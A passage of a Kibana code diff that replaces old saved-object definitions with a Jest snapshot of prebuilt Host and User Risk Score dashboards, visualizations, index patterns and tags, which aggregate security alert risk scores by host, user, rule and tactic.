Score"},"schema":"metric"},{"id":"1","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"user.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"User"},"schema":"split"},{"id":"4","enabled":true,"type":"terms","params":{"field":"signal.rule.name","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Name"},"schema":"bucket"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.type","orderBy":"2","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Rule Type"},"schema":"bucket"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', - }, - coreMigrationVersion: '7.13.4', - id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', - migrationVersion: { visualization: '7.13.1' }, - references: [ - { - id: 'siem-signals-default-index-pattern', - name: 'kibanaSavedObjectMeta.searchSourceJSON.index', - type: 'index-pattern', - }, - ], - type: 'visualization', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: '', - kibanaSavedObjectMeta: { - searchSourceJSON: - '{"query":{"query":"","language":"kuery"},"filter":[],"indexRefName":"kibanaSavedObjectMeta.searchSourceJSON.index"}', - }, - title: 'Host Risk Score (Tactic Breakdown)- Verbose', - uiStateJSON: '{}', - version: 1, - visState: - '{"title":"Host Risk Score (Tactic Breakdown)- Verbose","type":"table","aggs":[{"id":"1","enabled":true,"type":"sum","params":{"field":"signal.rule.risk_score","customLabel":"Total Risk 
Score"},"schema":"metric"},{"id":"3","enabled":true,"type":"terms","params":{"field":"host.name","orderBy":"1","order":"desc","size":20,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":false,"missingBucketLabel":"Missing","customLabel":"Host"},"schema":"split"},{"id":"5","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.tactic.name","orderBy":"1","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Tactic"},"schema":"bucket"},{"id":"6","enabled":true,"type":"terms","params":{"field":"signal.rule.threat.technique.name","orderBy":"1","order":"desc","size":50,"otherBucket":false,"otherBucketLabel":"Other","missingBucket":true,"missingBucketLabel":"Other","customLabel":"Technique"},"schema":"bucket"},{"id":"7","enabled":true,"type":"count","params":{"customLabel":"Number of Hits"},"schema":"metric"}],"params":{"perPage":10,"showPartialRows":false,"showMetricsAtAllLevels":false,"showTotal":false,"showToolbar":false,"totalFunc":"sum","percentageCol":"","row":true}}', - }, - coreMigrationVersion: '7.13.4', - id: 'b2dbc9b0-cf94-11eb-bd37-7bb50422e346', - migrationVersion: { visualization: '7.13.1' }, - references: [ - { - id: 'siem-signals-default-index-pattern', - name: 'kibanaSavedObjectMeta.searchSourceJSON.index', - type: 'index-pattern', - }, - ], - type: 'visualization', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { color: '#D36086', description: '', name: 'experimental' }, - coreMigrationVersion: '7.13.4', - id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', - references: [], - type: 'tag', - updated_at: '2021-08-18T16:27:39.980Z', - }, - { - attributes: { - description: - 'This dashboard allows users to drill down further into the details of the risk components associated with a particular host.', - hits: 0, - kibanaSavedObjectMeta: { - searchSourceJSON: '{"query":{"language":"kuery","query":""},"filter":[]}', - }, - optionsJSON: 
'{"hidePanelTitles":false,"useMargins":true}', - panelsJSON: - '[{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":0,"w":48,"h":3,"i":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195"},"panelIndex":"eaa57cf4-7ca3-4919-ab76-dbac0eb6a195","embeddableConfig":{"savedVis":{"title":"","description":"","type":"markdown","params":{"fontSize":12,"openLinksInNewTab":false,"markdown":"The Host Risk Score capability is an experimental feature released in 7.14. You can read further about it [here](https://github.com/elastic/detection-rules/blob/main/docs/experimental-machine-learning/host-risk-score.md)."},"uiState":{},"data":{"aggs":[],"searchSource":{"query":{"query":"","language":"kuery"},"filter":[]}}},"hidePanelTitles":true,"enhancements":{}}},{"version":"7.13.4","type":"lens","gridData":{"x":0,"y":3,"w":48,"h":15,"i":"e11ed08e-70d0-4c69-991a-12e20dc89440"},"panelIndex":"e11ed08e-70d0-4c69-991a-12e20dc89440","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"339da811-5c23-4432-9649-53cb066e6aaf","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Cumulative Host Risk Score (multiple hosts)","panelRefName":"panel_e11ed08e-70d0-4c69-991a-12e20dc89440"},{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":18,"w":24,"h":28,"i":"cae82aa1-20c8-4354-94ab-3934ac53b8fe"},"panelIndex":"cae82aa1-20c8-4354-94ab-3934ac53b8fe","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"0fd43778-bd5d-4b2b-85c3-47ac3b756434","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host 
View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Associated Rules of Risky Hosts","panelRefName":"panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe"},{"version":"7.13.4","type":"visualization","gridData":{"x":24,"y":18,"w":24,"h":28,"i":"8d09b97c-a023-4b7e-9e9d-1c46e726a487"},"panelIndex":"8d09b97c-a023-4b7e-9e9d-1c46e726a487","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"593ff0e6-25da-47ad-b81d-9a0106c0e9aa","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Associated Users of Risky Hosts","panelRefName":"panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487"},{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":46,"w":48,"h":16,"i":"0c9c8318-ebb0-47fb-919a-1836ebf232ae"},"panelIndex":"0c9c8318-ebb0-47fb-919a-1836ebf232ae","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"a76ea63c-da92-4bad-b3d6-6df823e1c04b","triggers":["VALUE_CLICK_TRIGGER"],"action":{"factoryId":"URL_DRILLDOWN","name":"Go to Host View","config":{"url":{"template":"{{kibanaUrl}}/app/security/hosts/{{context.panel.filters.[0].meta.params.query}}"},"openInNewTab":true,"encodeUrl":true}}}]}},"hidePanelTitles":false},"title":"Tactic Breakdown of Risky Hosts (Verbose)","panelRefName":"panel_0c9c8318-ebb0-47fb-919a-1836ebf232ae"}]', - timeRestore: false, - title: 'Drilldown of Host Risk Score', - version: 1, - }, - coreMigrationVersion: '7.13.4', - id: '6f05c8c0-cf77-11eb-9a96-05d89f94ad96', - migrationVersion: { dashboard: '7.13.1' }, - references: [ - { - id: 'd3f72670-d3a0-11eb-bd37-7bb50422e346', - name: 
'e11ed08e-70d0-4c69-991a-12e20dc89440:panel_e11ed08e-70d0-4c69-991a-12e20dc89440', - type: 'lens', - }, - { - id: '42371d00-cf7a-11eb-9a96-05d89f94ad96', - name: 'cae82aa1-20c8-4354-94ab-3934ac53b8fe:panel_cae82aa1-20c8-4354-94ab-3934ac53b8fe', - type: 'visualization', - }, - { - id: 'a62d3ed0-cf92-11eb-a0ff-1763d16cbda7', - name: '8d09b97c-a023-4b7e-9e9d-1c46e726a487:panel_8d09b97c-a023-4b7e-9e9d-1c46e726a487', - type: 'visualization', - }, - { - id: 'b2dbc9b0-cf94-11eb-bd37-7bb50422e346', - name: '0c9c8318-ebb0-47fb-919a-1836ebf232ae:panel_0c9c8318-ebb0-47fb-919a-1836ebf232ae', - type: 'visualization', - }, - { - id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', - name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', - type: 'tag', - }, - ], - type: 'dashboard', - updated_at: '2021-08-18T17:09:15.576Z', - }, - { - attributes: { - fieldAttrs: '{}', - fields: '[]', - runtimeFieldMap: '{}', - timeFieldName: '@timestamp', - title: 'ml_host_risk_score_latest_default', - }, - coreMigrationVersion: '7.13.4', - id: 'ml-host-risk-score-latest-default-index-pattern', - migrationVersion: { 'index-pattern': '7.11.0' }, - references: [], - type: 'index-pattern', - updated_at: '2021-08-18T18:47:22.500Z', - }, - { - attributes: { - description: null, - state: { - datasourceStates: { - indexpattern: { - layers: { - '2f34d626-d0ee-4ade-9e75-13c480699485': { - columnOrder: [ - '9c8c581f-6cb8-4ecf-8eb3-4c6df33edc5d', - 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04', - 'e2444d64-721a-4532-9633-5b206eee76d6', - ], - columns: { - '9c8c581f-6cb8-4ecf-8eb3-4c6df33edc5d': { - customLabel: true, - dataType: 'string', - isBucketed: true, - label: 'Host Name', - operationType: 'terms', - params: { - missingBucket: false, - orderBy: { columnId: 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04', type: 'column' }, - orderDirection: 'desc', - otherBucket: true, - size: 20, - }, - scale: 'ordinal', - sourceField: 'host.name', - }, - 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04': { - customLabel: true, - dataType: 'number', - 
isBucketed: false, - label: 'Risk Score', - operationType: 'sum', - scale: 'ratio', - sourceField: 'risk_stats.risk_score', - }, - 'e2444d64-721a-4532-9633-5b206eee76d6': { - customLabel: true, - dataType: 'string', - isBucketed: false, - label: 'Current Risk', - operationType: 'last_value', - params: { sortField: '@timestamp' }, - scale: 'ordinal', - sourceField: 'risk.keyword', - }, - }, - incompleteColumns: {}, - }, - }, - }, - }, - filters: [], - query: { language: 'kuery', query: '' }, - visualization: { - columns: [ - { columnId: '9c8c581f-6cb8-4ecf-8eb3-4c6df33edc5d', isTransposed: false }, - { - alignment: 'left', - columnId: 'c547501b-fe04-4073-8b4e-dbbdc3a4ff04', - hidden: true, - isTransposed: false, - }, - { columnId: 'e2444d64-721a-4532-9633-5b206eee76d6', isTransposed: false }, - ], - layerId: '2f34d626-d0ee-4ade-9e75-13c480699485', - }, - }, - title: 'Current Risk Score for Hosts', - visualizationType: 'lnsDatatable', - }, - coreMigrationVersion: '7.13.4', - id: 'dc289c10-d4ff-11eb-a0ff-1763d16cbda7', - migrationVersion: { lens: '7.13.1' }, - references: [ - { - id: 'ml-host-risk-score-latest-default-index-pattern', - name: 'indexpattern-datasource-current-indexpattern', - type: 'index-pattern', - }, - { - id: 'ml-host-risk-score-latest-default-index-pattern', - name: 'indexpattern-datasource-layer-2f34d626-d0ee-4ade-9e75-13c480699485', - type: 'index-pattern', - }, - ], - type: 'lens', - updated_at: '2021-08-18T17:07:41.806Z', - }, - { - attributes: { - description: - 'This dashboard shows the most current list of risky hosts (Top 20) in an environment. 
', - hits: 0, - kibanaSavedObjectMeta: { - searchSourceJSON: '{"query":{"language":"kuery","query":""},"filter":[]}', - }, - optionsJSON: '{"hidePanelTitles":false,"useMargins":true}', - panelsJSON: - '[{"version":"7.13.4","type":"visualization","gridData":{"x":0,"y":0,"w":48,"h":3,"i":"287b65e9-0aaa-42ee-ab7b-d60b3937d37a"},"panelIndex":"287b65e9-0aaa-42ee-ab7b-d60b3937d37a","embeddableConfig":{"savedVis":{"title":"","description":"","type":"markdown","params":{"fontSize":12,"openLinksInNewTab":false,"markdown":"The Host Risk Score capability is an experimental feature released in 7.14. You can read further about it [here](https://github.com/elastic/detection-rules/blob/main/docs/experimental-machine-learning/host-risk-score.md)."},"uiState":{},"data":{"aggs":[],"searchSource":{"query":{"query":"","language":"kuery"},"filter":[]}}},"hidePanelTitles":true,"enhancements":{}},"title":"Note:"},{"version":"7.13.4","type":"lens","gridData":{"x":16,"y":3,"w":16,"h":15,"i":"654d55f8-f873-4348-96cd-5dce0b56ac32"},"panelIndex":"654d55f8-f873-4348-96cd-5dce0b56ac32","embeddableConfig":{"enhancements":{"dynamicActions":{"events":[{"eventId":"b04e60d5-4e34-4589-af2e-8e9c3a15936f","triggers":["FILTER_TRIGGER"],"action":{"factoryId":"DASHBOARD_TO_DASHBOARD_DRILLDOWN","name":"Go to Dashboard","config":{"useCurrentFilters":true,"useCurrentDateRange":true}}}]}},"hidePanelTitles":false},"title":"Current Risk Scores for Hosts","panelRefName":"panel_654d55f8-f873-4348-96cd-5dce0b56ac32"}]', - timeRestore: false, - title: 'Current Risk Score for Hosts', - version: 1, - }, - coreMigrationVersion: '7.13.4', - id: '27b483b0-d500-11eb-a0ff-1763d16cbda7', - migrationVersion: { dashboard: '7.13.1' }, - references: [ - { - id: 'dc289c10-d4ff-11eb-a0ff-1763d16cbda7', - name: '654d55f8-f873-4348-96cd-5dce0b56ac32:panel_654d55f8-f873-4348-96cd-5dce0b56ac32', - type: 'lens', - }, - { - id: '6f05c8c0-cf77-11eb-9a96-05d89f94ad96', - name: 
'654d55f8-f873-4348-96cd-5dce0b56ac32:drilldown:DASHBOARD_TO_DASHBOARD_DRILLDOWN:b04e60d5-4e34-4589-af2e-8e9c3a15936f:dashboardId', - type: 'dashboard', - }, - { - id: '1d00ebe0-f3b2-11eb-beb2-b91666445a94', - name: 'tag-1d00ebe0-f3b2-11eb-beb2-b91666445a94', - type: 'tag', - }, - ], - type: 'dashboard', - updated_at: '2021-08-18T17:08:00.467Z', - }, -]; diff --git a/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/__snapshots__/create_prebuilt_saved_objects.test.ts.snap b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/__snapshots__/create_prebuilt_saved_objects.test.ts.snap new file mode 100644 index 0000000000000..641772784ccc4 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/prebuilt_saved_objects/routes/__snapshots__/create_prebuilt_saved_objects.test.ts.snap 
@@ -0,0 +1,610 @@ +// Jest Snapshot v1, https://goo.gl/fbAQLP + +exports[`createPrebuiltSavedObjects should create saved objects from given template - "hostRiskScoreDashboards" 1`] = ` +Array [ + Object { + "attributes": Object { + "fieldAttrs": "{\\"kibana.alert.rule.name\\":{\\"count\\":2},\\"signal.rule.name\\":{\\"count\\":2},\\"signal.rule.risk_score\\":{\\"count\\":2},\\"signal.rule.type\\":{\\"count\\":1},\\"host.os.family\\":{\\"count\\":1},\\"host.os.full\\":{\\"count\\":1},\\"host.os.name\\":{\\"count\\":1},\\"host.os.platform\\":{\\"count\\":1},\\"host.os.version\\":{\\"count\\":1},\\"signal.rule.rule_id\\":{\\"count\\":2},\\"signal.rule.threat.tactic.id\\":{\\"count\\":2},\\"host.id\\":{\\"count\\":1},\\"host.name\\":{\\"count\\":1}}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": ".siem-signals-default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "d3ae2f80-fbc1-11eb-bac9-4d64e825480b", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "color": "#32057a", + "description": "", + "name": "ueba", + }, + "coreMigrationVersion": "8.3.0", + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "migrationVersion": Object { + "tag": "8.0.0", + }, + "references": Array [], + "type": "tag", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "state": Object { + "datasourceStates": Object { + "indexpattern": Object { + "layers": Object { + "b885eaad-3c68-49ad-9891-70158d912dbd": Object { + "columnOrder": Array [ + "1fced52d-7ba5-4254-8656-fe0d7ced586a", + "e82aed80-ee04-4ad1-9b9d-fde4a25be58a", + "1d9b32cd-62d9-44e5-bf43-109011adc714", + "1d9b32cd-62d9-44e5-bf43-109011adc714X0", + "1d9b32cd-62d9-44e5-bf43-109011adc714X1", + ], + "columns": Object { + "1d9b32cd-62d9-44e5-bf43-109011adc714": Object 
{ + "dataType": "number", + "isBucketed": false, + "label": "cumulative_sum(sum(signal.rule.risk_score))", + "operationType": "formula", + "params": Object { + "formula": "cumulative_sum(sum(signal.rule.risk_score))", + "isFormulaBroken": false, + }, + "references": Array [ + "1d9b32cd-62d9-44e5-bf43-109011adc714X1", + ], + "scale": "ratio", + }, + "1d9b32cd-62d9-44e5-bf43-109011adc714X0": Object { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of cumulative_sum(sum(signal.rule.risk_score))", + "operationType": "sum", + "params": Object { + "emptyAsNull": false, + }, + "scale": "ratio", + "sourceField": "signal.rule.risk_score", + }, + "1d9b32cd-62d9-44e5-bf43-109011adc714X1": Object { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of cumulative_sum(sum(signal.rule.risk_score))", + "operationType": "cumulative_sum", + "references": Array [ + "1d9b32cd-62d9-44e5-bf43-109011adc714X0", + ], + "scale": "ratio", + }, + "1fced52d-7ba5-4254-8656-fe0d7ced586a": Object { + "dataType": "string", + "isBucketed": true, + "label": "Top 30 values of user.name", + "operationType": "terms", + "params": Object { + "missingBucket": false, + "orderBy": Object { + "fallback": true, + "type": "alphabetical", + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": Object { + "id": "terms", + }, + "size": 30, + }, + "scale": "ordinal", + "sourceField": "user.name", + }, + "e82aed80-ee04-4ad1-9b9d-fde4a25be58a": Object { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": Object { + "includeEmptyRows": true, + "interval": "1d", + }, + "scale": "interval", + "sourceField": "@timestamp", + }, + }, + "incompleteColumns": Object {}, + }, + }, + }, + }, + "filters": Array [], + "query": Object { + "language": "kuery", + "query": "not user.name: SYSTEM", + }, + "visualization": Object { + "layers": Array [ + Object { + "accessors": 
Array [ + "1d9b32cd-62d9-44e5-bf43-109011adc714", + ], + "layerId": "b885eaad-3c68-49ad-9891-70158d912dbd", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "splitAccessor": "1fced52d-7ba5-4254-8656-fe0d7ced586a", + "xAccessor": "e82aed80-ee04-4ad1-9b9d-fde4a25be58a", + }, + ], + "legend": Object { + "isVisible": true, + "legendSize": "auto", + "position": "right", + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "yLeftExtent": Object { + "mode": "full", + }, + "yRightExtent": Object { + "mode": "full", + }, + }, + }, + "title": "User Risk Score (Max Risk Score Histogram)", + "visualizationType": "lnsXY", + }, + "coreMigrationVersion": "8.3.0", + "id": "60454070-9a5d-11ec-9633-5f782d122340", + "migrationVersion": Object { + "lens": "8.3.0", + }, + "references": Array [ + Object { + "id": "d3ae2f80-fbc1-11eb-bac9-4d64e825480b", + "name": "indexpattern-datasource-layer-b885eaad-3c68-49ad-9891-70158d912dbd", + "type": "index-pattern", + }, + Object { + "id": "14104360-2534-11ec-ad40-03fece8605c9", + "name": "tag-ref-14104360-2534-11ec-ad40-03fece8605c9", + "type": "tag", + }, + ], + "type": "lens", + "updated_at": "2022-06-22T22:06:12.160Z", + }, + Object { + "attributes": Object { + "fieldAttrs": "{\\"signal.rule.type\\":{\\"count\\":1},\\"host.name\\":{\\"count\\":1},\\"signal.rule.name\\":{\\"count\\":1}}", + "fields": "[]", + "runtimeFieldMap": "{}", + "timeFieldName": "@timestamp", + "title": ".siem-signals-default", + "typeMeta": "{}", + }, + "coreMigrationVersion": "8.3.0", + "id": "siem-signals-default-index-pattern", + "migrationVersion": Object { + "index-pattern": "8.0.0", + }, + "references": Array [], + "type": "index-pattern", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"user.name: 
root\\",\\"language\\":\\"kuery\\"},\\"filter\\":[],\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.index\\"}", + }, + "title": "Associated Users (Rule Breakdown)", + "uiStateJSON": "{}", + "version": 1, + "visState": "{\\"title\\":\\"Associated Users (Rule Breakdown)\\",\\"type\\":\\"table\\",\\"aggs\\":[{\\"id\\":\\"2\\",\\"enabled\\":true,\\"type\\":\\"sum\\",\\"params\\":{\\"field\\":\\"signal.rule.risk_score\\",\\"customLabel\\":\\"Total Risk Score\\",\\"emptyAsNull\\":false},\\"schema\\":\\"metric\\"},{\\"id\\":\\"1\\",\\"enabled\\":true,\\"type\\":\\"count\\",\\"params\\":{\\"customLabel\\":\\"Number of Hits\\",\\"emptyAsNull\\":false},\\"schema\\":\\"metric\\"},{\\"id\\":\\"3\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"user.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"User\\"},\\"schema\\":\\"split\\"},{\\"id\\":\\"4\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":50,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule Name\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"5\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.type\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":50,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule Type\\"},\\"schema\\":\\"bucket\\"}],\\"params\\":{\\"perPage\\":25,\\"showPartialRows\\":false,\\"showMetricsAtAllLevels\\":false,\\"showTotal\\":false,\\"showToolbar\\":false,\\"totalFunc\\":\\"sum\\",\\"percentageCol\\":\\"\\",\\"row\\":true,\\"autoFitRowToContent\\":true}}", + }, + 
"coreMigrationVersion": "8.3.0", + "id": "a62d3ed0-cf92-11eb-a0ff-1763d16cbda7", + "migrationVersion": Object { + "visualization": "8.3.0", + }, + "references": Array [ + Object { + "id": "siem-signals-default-index-pattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern", + }, + ], + "type": "visualization", + "updated_at": "2022-06-22T22:01:24.771Z", + }, + Object { + "attributes": Object { + "description": "", + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"\\",\\"language\\":\\"kuery\\"},\\"filter\\":[],\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.index\\"}", + }, + "title": "Alerts by Hostname", + "uiStateJSON": "{}", + "version": 1, + "visState": "{\\"title\\":\\"Host Risk Score (Rule Breakdown)\\",\\"type\\":\\"table\\",\\"aggs\\":[{\\"id\\":\\"2\\",\\"enabled\\":true,\\"type\\":\\"sum\\",\\"params\\":{\\"field\\":\\"signal.rule.risk_score\\",\\"customLabel\\":\\"Total Risk Score\\"},\\"schema\\":\\"metric\\"},{\\"id\\":\\"1\\",\\"enabled\\":true,\\"type\\":\\"count\\",\\"params\\":{\\"customLabel\\":\\"Number of Hits\\"},\\"schema\\":\\"metric\\"},{\\"id\\":\\"3\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"host.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Host\\"},\\"schema\\":\\"split\\"},{\\"id\\":\\"4\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.name\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule 
Name\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"5\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.type\\",\\"orderBy\\":\\"2\\",\\"order\\":\\"desc\\",\\"size\\":20,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Rule Type\\"},\\"schema\\":\\"bucket\\"}],\\"params\\":{\\"perPage\\":10,\\"showPartialRows\\":false,\\"showMetricsAtAllLevels\\":false,\\"showTotal\\":false,\\"showToolbar\\":false,\\"totalFunc\\":\\"sum\\",\\"percentageCol\\":\\"\\",\\"row\\":true}}", + }, + "coreMigrationVersion": "8.3.0", + "id": "42371d00-cf7a-11eb-9a96-05d89f94ad96", + "migrationVersion": Object { + "visualization": "8.3.0", + }, + "references": Array [ + Object { + "id": "siem-signals-default-index-pattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern", + }, + ], + "type": "visualization", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "description": "", + "kibanaSavedObjectMeta": Object { + "searchSourceJSON": "{\\"query\\":{\\"query\\":\\"not user.name : *$\\",\\"language\\":\\"kuery\\"},\\"filter\\":[],\\"indexRefName\\":\\"kibanaSavedObjectMeta.searchSourceJSON.index\\"}", + }, + "title": "User Risk Score (Tactic Breakdown)- Verbose", + "uiStateJSON": "{}", + "version": 1, + "visState": "{\\"title\\":\\"User Risk Score (Tactic Breakdown)- Verbose\\",\\"type\\":\\"table\\",\\"aggs\\":[{\\"id\\":\\"1\\",\\"enabled\\":true,\\"type\\":\\"sum\\",\\"params\\":{\\"field\\":\\"signal.rule.risk_score\\",\\"customLabel\\":\\"Total Risk 
Score\\"},\\"schema\\":\\"metric\\"},{\\"id\\":\\"3\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"user.name\\",\\"orderBy\\":\\"1\\",\\"order\\":\\"desc\\",\\"size\\":40,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":false,\\"missingBucketLabel\\":\\"Missing\\",\\"customLabel\\":\\"Username\\"},\\"schema\\":\\"split\\"},{\\"id\\":\\"5\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.threat.tactic.name\\",\\"orderBy\\":\\"1\\",\\"order\\":\\"desc\\",\\"size\\":100,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":true,\\"missingBucketLabel\\":\\"Other\\",\\"customLabel\\":\\"Tactic\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"6\\",\\"enabled\\":true,\\"type\\":\\"terms\\",\\"params\\":{\\"field\\":\\"signal.rule.threat.technique.name\\",\\"orderBy\\":\\"1\\",\\"order\\":\\"desc\\",\\"size\\":100,\\"otherBucket\\":false,\\"otherBucketLabel\\":\\"Other\\",\\"missingBucket\\":true,\\"missingBucketLabel\\":\\"Other\\",\\"customLabel\\":\\"Technique\\"},\\"schema\\":\\"bucket\\"},{\\"id\\":\\"7\\",\\"enabled\\":true,\\"type\\":\\"count\\",\\"params\\":{\\"customLabel\\":\\"Number of Hits\\"},\\"schema\\":\\"metric\\"}],\\"params\\":{\\"perPage\\":10,\\"showPartialRows\\":false,\\"showMetricsAtAllLevels\\":false,\\"showTotal\\":false,\\"showToolbar\\":false,\\"totalFunc\\":\\"sum\\",\\"percentageCol\\":\\"\\",\\"row\\":true,\\"autoFitRowToContent\\":false}}", + }, + "coreMigrationVersion": "8.3.0", + "id": "183d32f0-9a5e-11ec-90d3-1109ed409ab5", + "migrationVersion": Object { + "visualization": "8.3.0", + }, + "references": Array [ + Object { + "id": "siem-signals-default-index-pattern", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern", + }, + ], + "type": "visualization", + "updated_at": "2022-06-22T21:55:25.560Z", + }, + Object { + "attributes": Object { + "color": "#D36086", + "description": "", + "name": 
